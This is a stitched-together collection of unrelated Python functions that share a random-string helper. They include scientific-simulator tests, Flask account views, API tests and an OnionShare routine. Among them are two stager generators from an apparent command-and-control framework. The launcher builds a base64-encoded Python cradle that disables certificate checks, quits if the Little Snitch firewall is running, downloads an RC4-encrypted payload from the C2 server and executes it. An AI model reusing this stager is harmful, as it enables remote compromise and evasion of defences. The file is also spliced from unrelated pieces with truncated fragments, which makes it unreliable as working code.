def test_solvr(write_read):
    parameters_ref = {
        "solver": {
            "method": numpy.random.randint(10),
            "z_precond": helpers.random_string(2),
            "o_precond": helpers.random_string(2),
            "rel_iter_max": numpy.random.rand(),
            "eps": numpy.random.rand(),
        },
    }
    parameters = write_read(parameters_ref)
    assert parameters_ref["solver"]["method"] == parameters["solver"]["method"]
    assert parameters_ref["solver"]["z_precond"] == parameters["solver"]["z_precond"]
    assert parameters_ref["solver"]["o_precond"] == parameters["solver"]["o_precond"]
    assert numpy.allclose(
        parameters_ref["solver"]["rel_iter_max"],
        parameters["solver"]["rel_iter_max"],
        atol=1.0e-5,
    )
    assert numpy.allclose(
        parameters_ref["solver"]["eps"],
        parameters["solver"]["eps"],
        atol=1.0e-5,
    )
def generate_stager_hop(self, server, key, profile, encrypt=True, encode=True):
    """
    Generate the Python stager for hop.php redirectors that will perform
    key negotiation with the server and kick off the agent.
    """
    # read in the stager base
    f = open(self.installPath + "./data/agent/stager_hop.py")
    stager = f.read()
    f.close()

    stager = helpers.strip_python_comments(stager)

    # first line of randomized text to change up the ending RC4 string
    randomHeader = "%s='%s'\n" % (helpers.random_string(), helpers.random_string())
    stager = randomHeader + stager

    # patch the server and key information
    stager = stager.replace("REPLACE_SERVER", server)
    stager = stager.replace("REPLACE_STAGING_KEY", key)
    stager = stager.replace("REPLACE_PROFILE", profile)
    stager = stager.replace("index.jsp", self.stage1)
    stager = stager.replace("index.php", self.stage2)

    # # base64 encode the stager and return it
    # if encode:
    #     return ""

    if encrypt:
        # return an encrypted version of the stager ("normal" staging)
        # return encryption.xor_encrypt(stager, key)
        return encryption.rc4(key, stager)
    else:
        # otherwise return the case-randomized stager
        return stager
def test_title(write_read, single):
    parameters_ref = {
        "title": (
            helpers.random_string(80)
            if single
            else [helpers.random_string(80) for _ in range(numpy.random.randint(5) + 2)]
        ),
    }
    parameters = write_read(parameters_ref)
    assert parameters_ref["title"] == parameters["title"]
def __init__(self):
    def exit():
        os.killpg(os.getpgid(jshell_process.pid), signal.SIGTERM)
        os.killpg(os.getpgid(dummy_input_process.pid), signal.SIGTERM)
        for f in [in_path, out_path, snippet_path]:
            try:
                os.remove(f)
            except FileNotFoundError:
                pass

    atexit.register(exit)

    mkdir("snippets")
    mkdir("fifos")

    self.EOF_key = random_string(32)
    self.snippet_key = random_string(32)
    self.fifo_key = random_string(32)

    snippet_path = "snippets/" + self.snippet_key
    in_path = "fifos/in_" + self.fifo_key
    out_path = "fifos/out_" + self.fifo_key

    for path in [in_path, out_path]:
        try:
            os.mkfifo(path)
        except FileExistsError:
            pass

    dummy_input_process = subprocess.Popen(
        f"(while true; do sleep 86400; done) > {in_path}",
        shell=True,
        preexec_fn=os.setsid,
    )
    jshell_process = subprocess.Popen(
        f"jshell < {in_path} | tee -a fifos/log_{self.EOF_key}",
        shell=True,
        preexec_fn=os.setsid,
        universal_newlines=True,
        stdout=subprocess.PIPE,
    )

    # This is needed so that exit() can refer to both
    # processes without using self.{process}.
    # This way, garbage collection of this jshell
    # instance works properly.
    self.dummy_input_process = dummy_input_process
    self.jshell_process = jshell_process
    self.in_path = in_path
    self.out_path = out_path
    self.snippet_path = snippet_path

    self.jshell_process.stdout.read(89)
def test_flac(write_read):
    parameters_ref = {
        "flac": {
            "creep": bool(numpy.random.randint(2)),
            "porosity_model": numpy.random.randint(10),
            "version": numpy.random.randint(10),
        },
        "rocks": {
            helpers.random_string(5): {
                "permeability_model": {
                    "id": numpy.random.randint(10),
                    "parameters": numpy.random.rand(numpy.random.randint(7) + 1),
                },
                "equivalent_pore_pressure": {
                    "id": numpy.random.randint(10),
                    "parameters": numpy.random.rand(numpy.random.randint(7) + 1),
                },
            }
            for _ in numpy.random.rand(10) + 1
        },
    }
    parameters = write_read(parameters_ref)
    helpers.allclose_dict(parameters_ref["flac"], parameters["flac"])
    for k, v in parameters_ref["rocks"].items():
        for kk, vv in v.items():
            helpers.allclose_dict(vv, parameters["rocks"][k][kk], atol=1.0e-4)
def update_account():
    form = AccountDataForm()
    user = g.user
    if request.method == 'GET':
        form.email.data = user.email
        form.language.data = user.language
        form.timezone.data = user.timezone
    elif request.method == 'POST' and form.validate_on_submit():
        if password_hash(form.old_password.data) != user.password:
            form.old_password.errors.append(_('Wrong password'))
            return render_template('update_account.html', form=form)
        if form.email.data != user.email:
            user.email = form.email.data
            user.confirmed = False
            user.confirmation_string = random_string(20)
            msg = message_confirmation(user.id, user.email, user.confirmation_string)
            mail.send(msg)
            flash(_('Confirmation message sent, check your e-mail'))
        if form.password.data:
            user.password = password_hash(form.password.data)
            flash(_('Password successfully changed'))
        user.language = form.language.data
        user.timezone = form.timezone.data
        db.session.commit()
        return redirect('update_account')
    return render_template('update_account.html', form=form)
def brief_title(request):
    title = random_string()

    def fin():
        delete_brief(title)

    request.addfinalizer(fin)
    return title
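# A hypothetical test consuming the fixture above (assuming it is registered with
# @pytest.fixture in the surrounding module). It is shown only to illustrate how the
# random title and its finalizer-based cleanup would be used; `create_brief` and
# `brief_exists` are assumed helpers, not part of the original code.
def test_create_brief(brief_title):
    create_brief(brief_title)          # assumed helper: creates a brief with this title
    assert brief_exists(brief_title)   # assumed helper: checks the brief was created
    # delete_brief(brief_title) runs automatically via the fixture's finalizer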
def test_oft(write_read, oft, n):
    parameters_ref = {
        oft: [helpers.random_string(n) for _ in range(numpy.random.randint(10) + 1)]
    }
    parameters = write_read(parameters_ref)
    assert parameters_ref[oft] == parameters[oft]
def test_dataset_update_bad(dataset_for_tests):
    """Confirm that bad requests will be rejected."""
    indata = {"dataset": {"title": "Updated title"}}
    ds_uuid = helpers.random_string()
    responses = helpers.make_request_all_roles(
        f"/api/v1/dataset/{ds_uuid}", method="PATCH", data=indata
    )
    for response in responses:
        if response.role in ("edit", "data", "root"):
            assert response.code == 404
        elif response.role == "no-login":
            assert response.code == 401
        else:
            assert response.code == 403
        assert not response.data

    ds_uuid = uuid.uuid4().hex
    responses = helpers.make_request_all_roles(
        f"/api/v1/dataset/{ds_uuid}", method="PATCH", data=indata
    )
    for response in responses:
        if response.role in ("edit", "data", "root"):
            assert response.code == 404
        elif response.role == "no-login":
            assert response.code == 401
        else:
            assert response.code == 403
        assert not response.data

    ds_uuid = dataset_for_tests
    session = requests.Session()
    helpers.as_user(session, helpers.USERS["data"])

    indata = {"title": ""}
    response = helpers.make_request(
        session, f"/api/v1/dataset/{ds_uuid}", method="PATCH", data=indata
    )
    assert response.code == 400
    assert not response.data

    indata = {"dataset": {"extra": "asd"}}
    response = helpers.make_request(
        session, f"/api/v1/dataset/{ds_uuid}", method="PATCH", data=indata
    )
    assert response.code == 400
    assert not response.data

    indata = {"dataset": {"timestamp": "asd"}}
    response = helpers.make_request(
        session, f"/api/v1/dataset/{ds_uuid}", method="PATCH", data=indata
    )
    assert response.code == 400
    assert not response.data
def test_incon(anisotropic):
    # Create 3D mesh
    dx = numpy.arange(3) + 1
    dy = numpy.arange(4) + 1
    dz = numpy.arange(5) + 1
    mesh = toughio.meshmaker.structured_grid(
        dx, dy, dz, material=helpers.random_string(5)
    )

    initial_condition = numpy.random.rand(mesh.n_cells, 4)
    mesh.add_cell_data("initial_condition", initial_condition)

    porosity = numpy.random.rand(mesh.n_cells)
    mesh.add_cell_data("porosity", porosity)

    if anisotropic is not None:
        permeability = (
            numpy.random.rand(mesh.n_cells, 3)
            if anisotropic
            else numpy.random.rand(mesh.n_cells)
        )
        mesh.add_cell_data("permeability", permeability)

    parameters = helpers.write_read(
        filename="INCON",
        obj=None,
        writer=mesh.write_incon,
        reader=toughio.read_mesh,
        reader_kws={"file_format": "tough"},
    )

    # Check block INCON
    assert sorted(mesh.labels) == sorted(parameters["initial_conditions"].keys())

    values = [
        parameters["initial_conditions"][label]["values"] for label in mesh.labels
    ]
    assert numpy.allclose(mesh.cell_data["initial_condition"], values)

    porosity = [
        parameters["initial_conditions"][label]["porosity"] for label in mesh.labels
    ]
    assert numpy.allclose(mesh.cell_data["porosity"], porosity)

    if anisotropic is not None:
        userx = numpy.array(
            [
                parameters["initial_conditions"][label]["userx"]
                for label in mesh.labels
            ]
        )
        permeability = userx[:, :3] if anisotropic else userx[:, 0]
        assert numpy.allclose(
            mesh.cell_data["permeability"], permeability, atol=1.0e-4
        )
def start_hidden_service(self, gui=False, tails_root=False):
    if not self.port:
        self.choose_port()

    if helpers.get_platform() == 'Tails' and not tails_root:
        # in Tails, start the hidden service in a root process
        if gui:
            args = ['/usr/bin/gksudo', '-D', 'OnionShare', '--', '/usr/bin/onionshare']
        else:
            args = ['/usr/bin/sudo', '--', '/usr/bin/onionshare']
        p = subprocess.Popen(args + [str(self.port)], stderr=subprocess.PIPE, stdout=subprocess.PIPE)
        stdout = p.stdout.read(22)  # .onion URLs are 22 chars long

        if stdout:
            self.onion_host = stdout
        else:
            if p.poll() == -1:
                raise TailsError(p.stderr.read())
            else:
                raise TailsError(strings._("error_tails_unknown_root"))
    else:
        if self.local_only:
            self.onion_host = '127.0.0.1:{0}'.format(self.port)
        else:
            # come up with a hidden service directory name
            hidserv_dir = '{0}/onionshare_{1}'.format(helpers.get_tmp_dir(), helpers.random_string(8))
            self.cleanup_filenames.append(hidserv_dir)

            # connect to the tor controlport
            controller = False
            tor_control_ports = [9051, 9151]
            for tor_control_port in tor_control_ports:
                try:
                    controller = Controller.from_port(port=tor_control_port)
                    break
                except SocketError:
                    pass
            if not controller:
                raise NoTor(strings._("cant_connect_ctrlport").format(tor_control_ports))
            controller.authenticate()

            # set up hidden service
            controller.set_options([
                ('HiddenServiceDir', hidserv_dir),
                ('HiddenServicePort', '80 127.0.0.1:{0}'.format(self.port))
            ])

            # figure out the .onion hostname
            hostname_file = '{0}/hostname'.format(hidserv_dir)
            self.onion_host = open(hostname_file, 'r').read().strip()
def test_outpu(write_read, fmt):
    parameters_ref = {
        "output": {
            "format": fmt,
            "variables": {
                helpers.random_string(20): None,
                helpers.random_string(20): numpy.random.randint(10),
                helpers.random_string(20): numpy.random.randint(10, size=1),
                helpers.random_string(20): numpy.random.randint(10, size=2),
                helpers.random_string(20): numpy.random.randint(
                    10, size=(numpy.random.randint(1, 10), 2)
                ),
            },
        },
    }
    parameters = write_read(parameters_ref)
    helpers.allclose_dict(
        parameters_ref["output"]["variables"], parameters["output"]["variables"]
    )
def dao_generate_bikes(self, number):
    db = firestore.Client()
    tran = db.transaction()
    for i in range(0, number):
        db.collection('bikes').document().set(
            {
                "title": random_string(10),
                "price": random.randint(100, 2000),
                "stars": random.choice([1, 2, 3, 4, 5]),
                "createdOn": datetime.now(tz=None),
            },
            merge=True,
        )
        db.collection('bikes').document("metainfo").set(
            {"total": Increment(1)}, merge=True
        )
    tran.commit()
async def login_task(request):
    redis = request.app['redis']
    user_ip, _ = request.transport.get_extra_info('peername')
    token = random_string()
    bits = await complexity.get(redis, user_ip)
    task = hashcash.new(bits=bits)
    await redis.set(token, json.dumps(task))
    await redis.expire(token, X_POFFW_EXPIRE)
    return web.json_response(data=task, headers={
        X_POFFW_HEADER: token,
    })
def upload_photo():
    try:
        file = request.files["user_file"]
    except KeyError:
        flash("No file sent.")
        return redirect(request.url)

    extension = os.path.splitext(file.filename)[1]
    if not allowed_file(file.filename):
        flash("The extension of this file (%s) is not allowed." % extension)
        return redirect("/")
    if not file.filename:
        flash("Please select a file.")
        return redirect("/")

    file.filename = random_string(16) + extension
    file.save(os.path.join(app.config['UPLOAD_FOLDER'], file.filename))
    file_path = os.path.join(app.config['UPLOAD_FOLDER'], file.filename)

    bytessize, width, height, exif = get_image_properties(file_path)

    datetime_original = exif.get('DateTimeOriginal', None)
    if datetime_original:
        datetime_original = datetime.datetime.strptime(
            datetime_original, '%Y:%m:%d %H:%M:%S'
        )
        datetime_original = datetime_original.strftime("%Y-%m-%d %H:%M:%S")
    else:
        flash("This photo is not dated. We assumed it was taken today.")

    user_id = flask_login.current_user.get_id()
    url = upload_file_to_s3(
        file_path,
        'users/%s/%s' % (user_id, file.filename),
        file.content_type,
        app.config["S3_BUCKET"],
    )

    now = datetime.datetime.now().strftime("%Y-%m-%d %H:%M:%S")
    cur = get_db().execute(
        """
        insert into photos (object, dt_uploaded, dt, original_name,
                            bytessize, width, height, user_id)
        values (?,?,?,?,?,?,?,?)""",
        (url, now, datetime_original or now, file.filename, bytessize,
         width, height, flask_login.current_user.get_id(),),
    )
    g._database.commit()
    cur.close()

    os.remove(file_path)
    return redirect("/")
def test_delete_bad():
    """Confirm that bad identifiers return 404."""
    session = requests.Session()
    helpers.as_user(session, helpers.USERS["data"])
    for _ in range(3):
        ds_uuid = helpers.random_string()
        response = helpers.make_request(
            session, f"/api/v1/dataset/{ds_uuid}", method="DELETE"
        )
        assert response.code == 404
        assert not response.data

        ds_uuid = uuid.uuid4()
        response = helpers.make_request(
            session, f"/api/v1/dataset/{ds_uuid}", method="DELETE"
        )
        assert response.code == 404
        assert not response.data
def test_indom(write_read, num_pvars, num_items):
    num_items = num_items if num_items else numpy.random.randint(10) + 1
    parameters_ref = {
        "rocks": {
            helpers.random_string(5): {
                "initial_condition": numpy.random.rand(num_pvars),
            }
            for _ in range(num_items)
        },
    }
    parameters = write_read(parameters_ref)
    for k, v in parameters_ref["rocks"].items():
        assert numpy.allclose(
            v["initial_condition"],
            parameters["rocks"][k]["initial_condition"],
            atol=1.0e-4,
        )
def get(self):
    fbcookie = facebook.get_user_from_cookie(self.request.cookies)
    if not fbcookie:
        self.redirect('/')
        return

    user = User.is_logged(self)
    graph = facebook.GraphAPI(fbcookie["access_token"])
    profile = graph.get_object("me")

    if not user:
        password = helpers.random_string(8)
        user = User(nickname=profile['username'].lower(),
                    password=User.slow_hash(password))
        user.fb_access_token = fbcookie["access_token"]
        try:
            user.about = profile['bio']
        except:
            pass
        try:
            user.location = profile['location']['name']
        except:
            pass
        try:
            user.firstname = profile['first_name']
        except:
            pass
        try:
            user.lastname = profile['last_name']
        except:
            pass
        try:
            user.fb_profile_url = profile['link']
        except:
            pass
        try:
            user.fb_ui = profile['id']
        except:
            pass
        user.put()

        session = get_current_session()
        session.regenerate_id()
        session['user'] = user
        self.redirect('/')
    else:
        if str(user.fb_ui) == str(profile['id']):
            self.redirect('/')
        else:
            # TODO
            # Did the user change their ID, or are they linking to an existing account?
            pass
def test_eleme(write_read, label_length, coord):
    labels = [
        helpers.random_label(label_length)
        for _ in range(numpy.random.randint(10) + 1)
    ]
    keys = [
        "nseq",
        "nadd",
        "material",
        "volume",
        "heat_exchange_area",
        "permeability_modifier",
        "center",
    ]
    parameters_ref = {
        "elements": {
            label: {
                key: (
                    numpy.random.randint(10)
                    if key in {"nseq", "nadd"}
                    else helpers.random_string(5)
                    if key == "material"
                    else numpy.random.rand(3)
                    if key == "center"
                    else numpy.random.rand()
                )
                for key in keys
            }
            for label in labels
        },
        "coordinates": coord,
    }
    parameters = write_read(parameters_ref)
    assert sorted(parameters_ref["elements"].keys()) == sorted(
        parameters["elements"].keys()
    )
    for k, v in parameters_ref["elements"].items():
        for kk, vv in v.items():
            if not isinstance(vv, str):
                assert numpy.allclose(vv, parameters["elements"][k][kk], atol=1.0e-4)
            else:
                assert vv == parameters["elements"][k][kk]
    assert parameters_ref["coordinates"] == parameters["coordinates"]
def test_save2incon(reset):
    this_dir = os.path.dirname(os.path.abspath(__file__))
    filename = os.path.join(this_dir, "support_files", "outputs", "SAVE.out")
    save = toughio.read_output(filename)

    output_filename = helpers.tempdir(helpers.random_string(10))
    argv = [
        filename,
        output_filename,
    ]
    if reset:
        argv += ["-r"]
    toughio._cli.save2incon(argv)
    incon = toughio.read_output(output_filename)

    assert save.labels.tolist() == incon.labels.tolist()
    helpers.allclose_dict(save.data, incon.data)
def account_problem():
    form = AccountProblemForm()
    if form.validate_on_submit():
        user = User.query.filter_by(email=form.email.data).first()
        if user is None:
            form.email.errors.append(_('Unknown e-mail address'))
        elif form.problem.data == 'confirmation':
            msg = message_confirmation(user.id, user.email, user.confirmation_string)
            mail.send(msg)
            flash(_('Confirmation message sent, check your e-mail'))
            return redirect('')
        elif form.problem.data == 'password':
            new_password = random_string(10)
            user.password = password_hash(new_password)
            db.session.commit()
            msg = message_reset_password(user.email, new_password)
            mail.send(msg)
            flash(_('Your password was reset, check your e-mail'))
            return redirect('')
    return render_template('account_problem.html', form=form)
def test_get_entry(mdb):
    """
    Confirm that entries are returned if they exist.

    Checks:
      * Existing collections
      * Existing datasets
      * Existing orders
      * Existing users
      * Bad uuids
      * Bad non-uuid identifiers
    """
    for dbcollection in ("collections", "datasets", "orders", "users"):
        entries = mdb[dbcollection].aggregate([{"$sample": {"size": 2}}])
        for entry in entries:
            res = utils.get_entry(mdb, dbcollection, str(entry["_id"]))
            assert res["_id"] == entry["_id"]

    for _ in range(3):
        assert not utils.get_entry(mdb, "collections", str(uuid.uuid4()))
        assert not utils.get_entry(mdb, "collections", helpers.random_string())
def sign_up():
    form = SignUpForm()
    if form.validate_on_submit():
        user = User()
        user.email = form.email.data
        user.password = password_hash(form.password.data)
        user.signed_up = datetime.datetime.utcnow()
        user.language = form.language.data
        user.timezone = form.timezone.data
        user.confirmation_string = random_string(20)
        db.session.add(user)
        try:
            db.session.commit()
        except IntegrityError as err:
            if err.message.find(user.email) != -1:
                form.email.errors.append(_('E-mail address is in use'))
        else:
            msg = message_confirmation(user.id, user.email, user.confirmation_string)
            mail.send(msg)
            flash(_('Successful sign up, check your e-mail'))
            return redirect('')
    return render_template('sign_up.html', form=form)
def keys(self):
    return [random_string(length=10) for i in xrange(10)]
def generate_launcher(self, listenerName, encode=True, userAgent="default", littlesnitch='True'):
    """
    Generate the initial Python 'download cradle' with a specified
    c2 server and a valid HTTP checksum.

    listenerName -> a name of a validly registered listener
    userAgent    -> "default" uses the UA from the default profile in the database
                    "none" sets no user agent
                    any other text is used as the user-agent
    """
    # if we don't have a valid listener, return nothing
    if not self.mainMenu.listeners.is_listener_valid(listenerName):
        print helpers.color("[!] Invalid listener: " + listenerName)
        return ""

    # extract the staging information from this specified listener
    (server, stagingKey, pivotServer, hop) = self.mainMenu.listeners.get_stager_config(listenerName)

    # if UA is 'default', use the UA from the default profile in the database
    if userAgent.lower() == "default":
        userAgent = self.userAgent

    # get the launching stage0 URI
    stage0uri = self.generate_launcher_uri(server, encode, pivotServer, hop)

    # adapted from MSF's python meterpreter staging
    #   https://github.com/rapid7/metasploit-framework/blob/master/lib/msf/core/payload/python/reverse_http.rb

    # first line of randomized text to change up the ending RC4 string
    launcherBase = "%s='%s'\n" % (helpers.random_string(), helpers.random_string())

    if "https" in stage0uri:
        # monkey patch ssl woohooo
        launcherBase += "import ssl;\nif hasattr(ssl, '_create_unverified_context'):ssl._create_default_https_context = ssl._create_unverified_context;\n"

    launcherBase += "import sys, urllib2;"

    try:
        if littlesnitch.lower() == 'true':
            launcherBase += "import re, subprocess;"
            launcherBase += "cmd = \"ps -ef | grep Little\ Snitch | grep -v grep\"\n"
            launcherBase += "ps = subprocess.Popen(cmd, shell=True, stdout=subprocess.PIPE)\n"
            launcherBase += "out = ps.stdout.read()\n"
            launcherBase += "ps.stdout.close()\n"
            launcherBase += "if re.search(\"Little Snitch\", out):\n"
            launcherBase += " sys.exit()\n"
    except Exception as e:
        p = "[!] Error setting LittleSnitch in stager: " + str(e)
        print helpers.color(p, color="Yellow")

    launcherBase += "o=__import__({2:'urllib2',3:'urllib.request'}[sys.version_info[0]],fromlist=['build_opener']).build_opener();"
    launcherBase += "UA='%s';" % (userAgent)
    launcherBase += "o.addheaders=[('User-Agent',UA)];"
    launcherBase += "a=o.open('%s').read();" % (stage0uri)
    launcherBase += "key='%s';" % (stagingKey)

    # RC4 decryption
    launcherBase += "S,j,out=range(256),0,[]\n"
    launcherBase += "for i in range(256):\n"
    launcherBase += " j=(j+S[i]+ord(key[i%len(key)]))%256\n"
    launcherBase += " S[i],S[j]=S[j],S[i]\n"
    launcherBase += "i=j=0\n"
    launcherBase += "for char in a:\n"
    launcherBase += " i=(i+1)%256\n"
    launcherBase += " j=(j+S[i])%256\n"
    launcherBase += " S[i],S[j]=S[j],S[i]\n"
    launcherBase += " out.append(chr(ord(char)^S[(S[i]+S[j])%256]))\n"
    launcherBase += "exec(''.join(out))"

    # base64 encode the stager and return it
    if encode:
        launchEncoded = base64.b64encode(launcherBase)
        # launcher = "python -c \"import sys,base64;exec(base64.b64decode('%s'));\"" % (launchEncoded)
        launcher = "echo \"import sys,base64;exec(base64.b64decode('%s'));\" | python &" % (launchEncoded)
        return launcher
    else:
        return launcherBase
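# For readability only: the same RC4 key-scheduling and keystream logic that the
# launcher above embeds as concatenated string fragments, pulled out into a
# standalone sketch. The function name `rc4_decrypt` is hypothetical and is not
# part of the original code; it simply restates the embedded logic.
def rc4_decrypt(key, data):
    # key-scheduling algorithm (KSA)
    S = list(range(256))
    j = 0
    for i in range(256):
        j = (j + S[i] + ord(key[i % len(key)])) % 256
        S[i], S[j] = S[j], S[i]
    # pseudo-random generation algorithm (PRGA), XORed against the ciphertext
    i = j = 0
    out = []
    for char in data:
        i = (i + 1) % 256
        j = (j + S[i]) % 256
        S[i], S[j] = S[j], S[i]
        out.append(chr(ord(char) ^ S[(S[i] + S[j]) % 256]))
    return ''.join(out)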
def test_title_1_with_short_description(self):
    description = random_string(30)
    actionitem = ActionItem()
    actionitem.description = description
    assert actionitem.title() == description
def values(self):
    return [random_string(length=50, with_spaces=True) for i in xrange(10)]
def test_gener(write_read, specific_enthalpy, label_length):
    n_rnd = numpy.random.randint(100) + 1
    parameters_ref = {
        "generators": {
            helpers.random_label(label_length): {
                "name": [
                    helpers.random_string(5),
                    helpers.random_string(5),
                    helpers.random_string(5),
                ],
                "nseq": numpy.random.randint(10, size=3),
                "nadd": numpy.random.randint(10, size=3),
                "nads": numpy.random.randint(10, size=3),
                "type": [
                    helpers.random_string(4),
                    helpers.random_string(4),
                    helpers.random_string(4),
                ],
                "times": [numpy.random.rand(10), None, numpy.random.rand(n_rnd)],
                "rates": [
                    numpy.random.rand(10),
                    numpy.random.rand(),
                    numpy.random.rand(n_rnd),
                ],
                "specific_enthalpy": [
                    numpy.random.rand(10),
                    numpy.random.rand(),
                    numpy.random.rand(n_rnd),
                ]
                if specific_enthalpy
                else None,
                "layer_thickness": numpy.random.rand(3),
            },
            helpers.random_label(label_length): {
                "name": [helpers.random_string(5), helpers.random_string(5)],
                "nseq": numpy.random.randint(10, size=2),
                "nadd": numpy.random.randint(10, size=2),
                "nads": numpy.random.randint(10, size=2),
                "type": [helpers.random_string(4), helpers.random_string(4)],
                "rates": numpy.random.rand(2),
            },
            helpers.random_label(label_length): {
                "nseq": numpy.random.randint(10),
                "nadd": numpy.random.randint(10),
                "nads": numpy.random.randint(10),
                "type": helpers.random_string(4),
                "rates": numpy.random.rand(),
                "layer_thickness": numpy.random.rand(),
            },
        },
    }
    parameters = write_read(parameters_ref)
    assert sorted(parameters_ref["generators"].keys()) == sorted(
        parameters["generators"].keys()
    )
    for k, v in parameters_ref["generators"].items():
        for kk, vv in v.items():
            if kk in {"name", "type"}:
                assert vv == parameters["generators"][k][kk]
            else:
                if kk == "specific_enthalpy" and not specific_enthalpy:
                    continue
                if numpy.ndim(vv):
                    for i, arr_ref in enumerate(vv):
                        arr = parameters["generators"][k][kk][i]
                        if arr_ref is not None:
                            assert numpy.allclose(arr, arr_ref, atol=1.0e-4)
                        else:
                            assert arr is None
                else:
                    assert numpy.allclose(
                        vv, parameters["generators"][k][kk], atol=1.0e-4
                    )
def test_rocks(write_read):
    keys = [
        "density",
        "porosity",
        "permeability",
        "conductivity",
        "specific_heat",
        "compressibility",
        "expansivity",
        "conductivity_dry",
        "tortuosity",
        "klinkenberg_parameter",
        "distribution_coefficient_3",
        "distribution_coefficient_4",
    ]
    parameters_ref = {
        "rocks": {
            helpers.random_string(5): {key: numpy.random.rand() for key in keys[:5]},
            helpers.random_string(5): {
                key: numpy.random.rand()
                if key != "permeability"
                else numpy.random.rand(3)
                for key in keys[:5]
            },
            helpers.random_string(5): {key: numpy.random.rand() for key in keys},
            helpers.random_string(5): {key: numpy.random.rand() for key in keys},
            helpers.random_string(5): {key: numpy.random.rand() for key in keys},
            helpers.random_string(5): {key: numpy.random.rand() for key in keys},
        }
    }
    names = list(parameters_ref["rocks"].keys())
    parameters_ref["rocks"][names[-1]].update(
        {
            "relative_permeability": {
                "id": numpy.random.randint(10),
                "parameters": numpy.random.rand(numpy.random.randint(7) + 1),
            },
        }
    )
    parameters_ref["rocks"][names[-2]].update(
        {
            "capillarity": {
                "id": numpy.random.randint(10),
                "parameters": numpy.random.rand(numpy.random.randint(7) + 1),
            },
        }
    )
    parameters_ref["rocks"][names[-3]].update(
        {
            "relative_permeability": {
                "id": numpy.random.randint(10),
                "parameters": numpy.random.rand(numpy.random.randint(7) + 1),
            },
            "capillarity": {
                "id": numpy.random.randint(10),
                "parameters": numpy.random.rand(numpy.random.randint(7) + 1),
            },
        }
    )
    parameters = write_read(parameters_ref)
    assert sorted(parameters_ref["rocks"].keys()) == sorted(parameters["rocks"].keys())
    for k, v in parameters_ref["rocks"].items():
        for kk, vv in v.items():
            if not isinstance(vv, dict):
                assert numpy.allclose(vv, parameters["rocks"][k][kk], atol=1.0e-5)
            else:
                helpers.allclose_dict(vv, parameters["rocks"][k][kk], atol=1.0e-4)
def __init__(self):
    self.snippet_key = random_string(32)
    self.restart()
except:
    seed = 0x1337

sections = conf.sections()

# Creates the services
for section in sections:
    if section.startswith('service-'):
        name = section[len('service-'):]
        services[name] = Service(name, Binary(name + "_0000"), 0)
        if len(services.values()) == num_services:
            break

# Fill in the unspecified services
for _ in range(len(services.values()), num_services):
    name = random_string(length=6).lower()
    services[name] = Service(name, Binary(name + "_0000"), 0)

for section in sections:
    if section.startswith('team-'):
        name = section[len('team-'):]
        try:
            team_type = conf.get(section, 'type')
        except:
            team_type = 'default'
        try:
            type1_probability = conf.get(section, 'type1_probability')
        except:
            type1_probability = 1.0
        try:
            type2_probability = conf.get(section, 'type2_probability')
def post(self):
    user = User.is_logged(self)
    if not user:
        self.redirect('/')

    key = self.request.get('edit')
    tags = [a.lower() for a in self.request.get_all('tags[]')]
    ingredients = self.request.get_all('ingredients[]')
    directions = self.request.get_all('directions[]')
    name = self.request.get('name')
    notes = self.request.get('notes')
    prep = self.request.get('prep_time')
    cook = self.request.get('cook_time')
    level = self.request.get('level')
    private = True if self.request.get('private') == "1" else False
    slug = helpers.sluglify(name)
    thumb = None
    tinythumb = None

    slug_exists = Koch.all().filter('slug =', slug).fetch(1)
    if len(slug_exists) == 1:
        # already exists
        slug = "%s-%s" % (slug, helpers.random_string())

    if self.request.get('photo'):
        try:
            img_data = self.request.POST.get('photo').file.read()
            img = images.Image(img_data)
            img.im_feeling_lucky()
            png_data = img.execute_transforms(images.JPEG)
            img.resize(620, 420)
            thumb = img.execute_transforms(images.JPEG)

            thmb = images.Image(img_data)
            thmb.im_feeling_lucky()
            png_data = thmb.execute_transforms(images.JPEG)
            thmb.resize(0, 80)
            tinythumb = thmb.execute_transforms(images.JPEG)
        except images.BadImageError:
            pass
        except images.NotImageError:
            pass
        except images.LargeImageError:
            pass

    if key:
        koch = Koch.get(key)
        koch.title = name
    else:
        koch = Koch(slug=slug, title=name, author=user)

    koch.notes = notes
    koch.prep_time = prep
    koch.cook_time = cook
    koch.level = level
    koch.private = private
    koch.tags = tags
    koch.ingredients = ingredients
    koch.directions = directions
    if thumb is not None:
        koch.photo = thumb
        koch.thumb = tinythumb

    for tag in tags:
        Tag.up(tag)

    if key:
        user.recipes += 1
        user.put()

    koch.put()
    self.redirect('/cook/%s' % (user.nickname))
# show them as snippets in our documentation. They do not need to be
# included when creating your own custom code.
#
# Example of smart-tags:
#   __something:
#   some code here
#   :something__

import base64
import json
import requests
import os
import helpers

wallet_name = helpers.random_string()
wallet_passphrase = helpers.random_string()

wallet_server_url = os.getenv("WALLETSERVER_URL")
if not helpers.check_url(wallet_server_url):
    print("Error: Invalid or missing WALLETSERVER_URL environment variable.")
    exit(1)

# Help guide users against including the API version suffix on the URL
wallet_server_url = helpers.check_wallet_url(wallet_server_url)

print(f"Creating a new wallet on {wallet_server_url}:")
print(f"- name:       {wallet_name}")
print(f"- passphrase: {wallet_passphrase}")

# __create_wallet:
from helpers import PytestRegex as regex
from helpers import random_string

INPUT_OUTPUT_DICT = {}

# ----------------------------------
# Registration test
INPUT = [
    [
        'post',
        {
            'url': '/registration',
            'data': {'username': random_string(), 'password': random_string()},
            'headers': None,
        },
    ]
]
EXPECTED_OUTPUT = [
    {
        'status': 'Success',
        'message': 'Successfully authenticated.',
        'auth_token': regex('.*'),
        'refresh_token': regex('.*'),
    }
]
INPUT_OUTPUT_DICT.update({'registration': [INPUT[:], EXPECTED_OUTPUT[:]]})

# ----------------------------------
# Login test
INPUT = [
    [
        'post',
        {
            'url': '/login',
            'data': {'username': '******', 'password': '******'},
            'headers': None,
        },
    ]
]
INPUT_OUTPUT_DICT.update({'login': [INPUT[:], EXPECTED_OUTPUT[:]]})

# ----------------------------------
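# Every snippet in this collection leans on a small `random_string` helper imported
# from a project-specific `helpers` module. The helpers themselves are not shown here;
# the sketch below is a hypothetical, minimal implementation of such a helper
# (supporting the `length` and `with_spaces` keywords seen above), not the actual
# code from any of these projects.
import random
import string


def random_string(length=10, with_spaces=False):
    """Return a random alphanumeric string, optionally containing spaces."""
    alphabet = string.ascii_letters + string.digits
    if with_spaces:
        alphabet += " "
    return "".join(random.choice(alphabet) for _ in range(length))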
parameters_ref = {
    "n_phase": n_phase,
    "diffusion": numpy.random.rand(numpy.random.randint(5) + 1, n_phase),
}
parameters = write_read(parameters_ref)
assert numpy.allclose(
    parameters_ref["diffusion"], parameters["diffusion"], atol=1.0e-4
)


